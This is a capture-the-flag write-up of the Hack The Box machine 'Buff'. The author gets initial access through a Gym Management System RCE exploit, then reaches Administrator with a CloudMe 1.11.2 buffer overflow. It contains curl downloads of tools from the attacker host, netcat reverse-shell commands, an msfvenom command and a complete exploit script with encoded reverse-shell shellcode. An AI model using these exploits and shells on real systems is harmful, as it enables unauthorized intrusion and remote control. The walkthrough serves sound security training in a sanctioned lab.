Hack The Box Writeup: Buff (10.10.10.198)

The first thing that might come to mind when seeing the machine name is a buffer overflow. If that is the case, you just guessed the procedure to obtain root on this machine. Using an exploit to gain a webshell on this Windows server is the starting point for running the CloudMe buffer overflow exploit to get root.

[0x1] Reconnaissance & Enumeration

Let’s see if we can find some open ports and services as a starting point. Port 7680 does not appear to have any function, but 8080 serves a website. Buff is a Windows machine but uses Apache to serve the website, so it probably runs something like WAMP/XAMPP.

nmap -sV -sC -p- -oA nmap_allports 10.10.10.198

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 07:47 EDT
Nmap scan report for buff (10.10.10.198)
Host is up (0.023s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 270.15 seconds

Port 8080 serves the Gym Management System 1.0. The website itself does not show any interesting information.

[0x2] Initial Foothold

A quick Searchsploit check for a known vulnerability I can use finds an Unauthenticated Remote Code Execution exploit. Nice!

searchsploit gym
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                                                                        | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                                                                                   | php/webapps/42801.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I grab the file on my machine and find out that you only need to run the script with the URL of the Gym Management System as a parameter. It does require Python 2, which my new Kali install does not like. To speed things up I switch to my Parrot machine, which still has support for Python 2.

python 48506.py http://10.10.10.198:8080/

When the exploit runs it tries to launch the webshell and gives you a limited shell to run commands. The exploit is successful and I have a shell as the user Shaun.

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun

Since the limited shell is not the easiest way to work with the machine, I download Netcat for Windows onto it to launch a full shell. I have Netcat on my attacker machine and serve it via a quick Python web server.

python -m SimpleHTTPServer 1337

I then use curl on Buff to download the file from my local web server.

curl http://10.10.14.64:1337/nc.exe -o nc.exe

Before running Netcat I start a listener on my local machine for the incoming connection.

netcat -lvnp 9001

With the listener running it’s time to start Netcat and get myself a full shell to Buff.

nc.exe 10.10.14.64 9001 -e cmd.exe

Mission accomplished, the reverse shell is connected without any hassle.

listening on [any] 9001 …

connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

[0x3] Path to User flag

The path to the user flag is not much of a path: a simple directory change and reading the text file.

 Directory of C:\Users\shaun\Desktop
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
03/09/2020 16:03 34 user.txt
               1 File(s) 34 bytes
               2 Dir(s) 8,861,081,600 bytes free

The expected file, in the expected location. I got myself a User flag!

C:\Users\shaun\Desktop>type user.txt
type user.txt
e6f2c0554599c57df16e0f741afc6321

[0x4] Path to Root flag

The machine does not really contain anything special besides the XAMPP installation. I enumerated this folder a bit but did not find any useful information. In Shaun's home directory I did notice a file in the Downloads folder called CloudMe 1.11.2.

 Directory of C:\Users\shaun\Downloads
03/09/2020 16:22 <DIR> .
03/09/2020 16:22 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
03/09/2020 16:04 59,392 nc.exe
               2 File(s) 17,890,216 bytes
               2 Dir(s) 8,801,017,856 bytes free

I did a quick check using Searchsploit and found a CloudMe 1.11.2 – Buffer Overflow exploit. Since the machine is called Buff, this makes sense.

searchsploit CloudMe
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The script has to run on the victim machine and connect to port 8888. The issue here is that Python is not installed on the machine, so running the script on it will not work. Someone hinted at using Plink and I looked into it. Plink opens an SSH connection from Buff to my attacker machine and, with -R, forwards a port on my machine back to CloudMe's port 8888 on Buff, so I can run the exploit locally against the tunnelled port.

Time to download Plink from my machine using Curl.

curl http://10.10.14.64:1337/plink.exe -o plink.exe

Let's start Plink and create the port forward.

C:\xampp\htdocs\gym\upload>plink.exe -l d0p4m1n3 -pw password 10.10.14.64 -R 8888:127.0.0.1:8888

The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 88:c2:f9:ac:d1:3e:14:26:1e:64:45:31:56:ef:89:5e
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Using username "d0p4m1n3".
Linux parrot 5.4.0-4parrot1-amd64 #1 SMP Parrot 5.4.19-4parrot1 (2020-02-27) x86_64
 ____ _ ____
| _ \ __ _ _ __ _ __ ___ | |_ / ___| ___ ___
| |_) / _` | '__| '__/ _ \| __| \___ \ / _ \/ __|
| __/ (_| | | | | | (_) | |_ ___) | __/ (__
|_| \__,_|_| |_| \___/ \__| |____/ \___|\___|

The programs included with the Parrot GNU/Linux are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Using msfvenom I generate the Python payload for the buffer overflow exploit script. The payload differs from the one in the stock exploit file, which only launches calc.exe, because I want it to launch a reverse shell.

msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.64 8443' -b '\x00\x0A\x0D' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1334 bytes

With the payload replaced with the newly generated one, the total script looks like this:

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052       # filler up to the saved return address
EIP = b"\xB5\x42\xA8\x68"       # 0x68A842B5 -> PUSH ESP, RET (written little-endian)
NOPS = b"\x90" * 30             # NOP sled in front of the shellcode

# Payload generated above with:
# msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.64 8443' -b '\x00\x0A\x0D' -f python
# (the stock PoC used: msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python)
payload = b""
payload += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31"
payload += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4"
payload += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75"
payload += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85"
payload += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a"
payload += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1"
payload += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4"
payload += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3"
payload += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98"
payload += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb"
payload += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49"
payload += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c"
payload += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72"
payload += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c"
payload += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac"
payload += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf"
payload += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59"
payload += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47"
payload += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77"
payload += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6"
payload += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a"

# pad the frame out to a fixed 1500 bytes
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))   # CloudMe port, reached here through the Plink tunnel
    s.send(buf)
    s.close()
except Exception as e:
    print(e)                    # the original used sys.exc_value, which is Python 2 only
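To see how the pieces of the frame above fit together (why the return address sits at offset 1052, why it is written little-endian, and why msfvenom was told to avoid \x00\x0A\x0D), here is an added Python 3 sanity check; it is not part of the original script or the EDB PoC, and the payload it uses is a constructed byte pattern standing in for the 273-byte shellcode.

```python
import struct

# Layout constants taken from the 48389.py script on this page.
PADDING_LEN = 1052            # bytes of filler before the saved return address
RET_ADDR = 0x68A842B5         # PUSH ESP; RET gadget, written little-endian on the wire
NOP_SLED = b"\x90" * 30       # sled between the return address and the shellcode
FRAME_LEN = 1500              # total bytes the script sends to CloudMe
BAD_CHARS = b"\x00\x0a\x0d"   # bytes msfvenom was told to avoid with -b


def build_frame(payload: bytes) -> bytes:
    """Assemble padding | EIP | NOPs | payload | filler exactly as the script does."""
    eip = struct.pack("<I", RET_ADDR)          # 0x68A842B5 -> b"\xb5\x42\xa8\x68"
    filler_len = FRAME_LEN - (PADDING_LEN + len(eip) + len(NOP_SLED) + len(payload))
    if filler_len < 0:
        raise ValueError("payload does not fit in the 1500-byte frame")
    return b"\x90" * PADDING_LEN + eip + NOP_SLED + payload + b"C" * filler_len


def check_frame(frame: bytes, payload: bytes) -> dict:
    """Checks a reviewer would run before trusting the frame layout."""
    eip_bytes = frame[PADDING_LEN:PADDING_LEN + 4]
    return {
        "length_ok": len(frame) == FRAME_LEN,
        "eip_bytes": eip_bytes,
        "eip_matches_gadget": struct.unpack("<I", eip_bytes)[0] == RET_ADDR,
        # where the shellcode lands: after padding, return address and sled
        "payload_offset": frame.find(payload),
        # any of these would truncate or mangle the payload in CloudMe's parser
        "bad_chars_in_payload": sorted({b for b in payload if b in BAD_CHARS}),
    }


# Constructed stand-in for the 273-byte shellcode (NOT real shellcode): a
# repeating byte pattern that happens to avoid the bad characters.
_ALPHABET = bytes(b for b in range(1, 256) if b not in BAD_CHARS)
SAMPLE_PAYLOAD = (_ALPHABET * 2)[:273]

if __name__ == "__main__":
    frame = build_frame(SAMPLE_PAYLOAD)
    for key, value in check_frame(frame, SAMPLE_PAYLOAD).items():
        print(f"{key}: {value!r}")
```

The check reports a payload offset of 1086 (1052 + 4 + 30), so the NOP sled, not the shellcode, is what ESP points at when the gadget returns.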

Before running the script I need to launch another listener. The port is the one used in the generation of the payload with MsfVenom, 8443.

netcat -lvnp 8443

Let’s launch the Python script, which connects to local port 8888 and is forwarded through the tunnel to CloudMe on the Buff machine.

python 48389.py

And it’s connected! The reverse connection was initiated from Buff to my machine, indicating that the payload ran without interruption. A quick check using whoami shows that the shell runs as Administrator.

Listening on [any] 8443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>hostname
hostname
BUFF

Last but not least, the root flag to officially mark this box as rooted.

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
9d5ab2de5c3175ae7a72093b61f0e580

All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!
